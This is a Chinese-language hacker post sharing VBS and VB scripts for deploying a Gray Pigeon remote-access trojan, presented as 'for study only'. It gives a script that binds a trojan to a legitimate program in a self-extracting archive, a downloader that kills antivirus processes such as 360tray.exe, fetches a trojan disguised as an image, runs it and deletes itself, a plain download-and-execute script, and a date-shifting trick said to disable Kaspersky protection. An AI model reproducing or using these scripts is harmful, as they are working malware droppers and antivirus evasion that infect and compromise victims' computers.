VBS脚本代码--HK版

灰鸽子生成的木马体积较大，很不实用。如果借助VBS脚本，配合使用效果会好很多。

一些曾经用过的VBS脚本代码（仅供学习、参考）：

（1）rar捆绑用的VBS脚本。用于把木马和正常软件捆绑在一起，成自解压文件。很具有欺骗性。

on error resume next
dim shell
set shell=CreateObject("Wscript.Shell")
shell.run "cmd /c start %SystemRoot%\千千静听.exe",0
shell.run ("cmd /c cd\ &&set date=%date% &&date 2000-11-18 &&ping 127.0.0.1 &&ping 127.0.0.1 &&ping 127.0.0.1 &&ping 127.0.0.1 &&ping 127.0.0.1 &&ping 127.0.0.1 &&ping 127.0.0.1 &&ping 127.0.0.1 &&start %SystemRoot%\木马.exe &&date %date% "),0

（2）下载者vbs脚本（本例，是图片和木马合并，再上传到任意知名的空间，的下载者。特点：速度快，不用找专门的上传空间）。

on error resume next
Set XXXXzlzl=CreateObject("Wscript.Shell")

Set sssxXXclean=CreateObject("ADODB.Stream")
Set ZZZzzzXXX = CreateObject("Msxml2.XMLHTTP")
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
if ps.Name="rfwsrv.exe" or ps.name="1.exe" or ps.name="2.exe" or ps.name="3.exe" or ps.name="360tray.exe"then
XXXXzlzl.run "ntsd -p "+cstr(+ps.handle) +" -c q",0
end if
next
ZZZzzzXXX.Open "GET","http://hiphotos.baidu.com这里是你捆绑了木马的图片地址.jpg",0
ZZZzzzXXX.Send()
sssxXXclean.Mode=3
sssxXXclean.Type=1
sssxXXclean.Open()
sssxXXclean.Write(ZZZzzzXXX.responseBody)
sssxXXclean.SaveToFile "c:\木马.rar "
XXXXzlzl.run ("cmd /c C:\Progra~1\WinRAR\RAR.exe x c:木马.rar c:\ &&del c:\木马.rar "),ture,vbhide
XXXXzlzl.run ("cmd /c set date=%date% &&date 2000-11-18 &&ping -n 15 127.0.0.1 &&start c:\木马.exe &&date %date% "),0
Set wWwwxXXx = CreateObject("Scripting.FileSystemObject")
wWwwxXXx.DeleteFile(WScript.ScriptName)

(3)    直接下载木马.exe的脚本。并不免杀。^_^

Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://www.××××/木马.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "c:\zl.exe",2
wscript.sleep 1000
Shell.Run ("c:\木马.exe") '延迟过后执行木马

--------------------------------

Private Sub Form_Load()
Date = Date - 5000
End Sub
Private Sub Timer1_Timer()
Date = Date + 5000
End
End Sub
很简单的几句话,timer设置15秒即可!

运行程序后日期由正确的日期减去5000天,然后经过15秒后又加上5000天!恢复了原来的时间!

卡巴在这个15秒内停止保护!!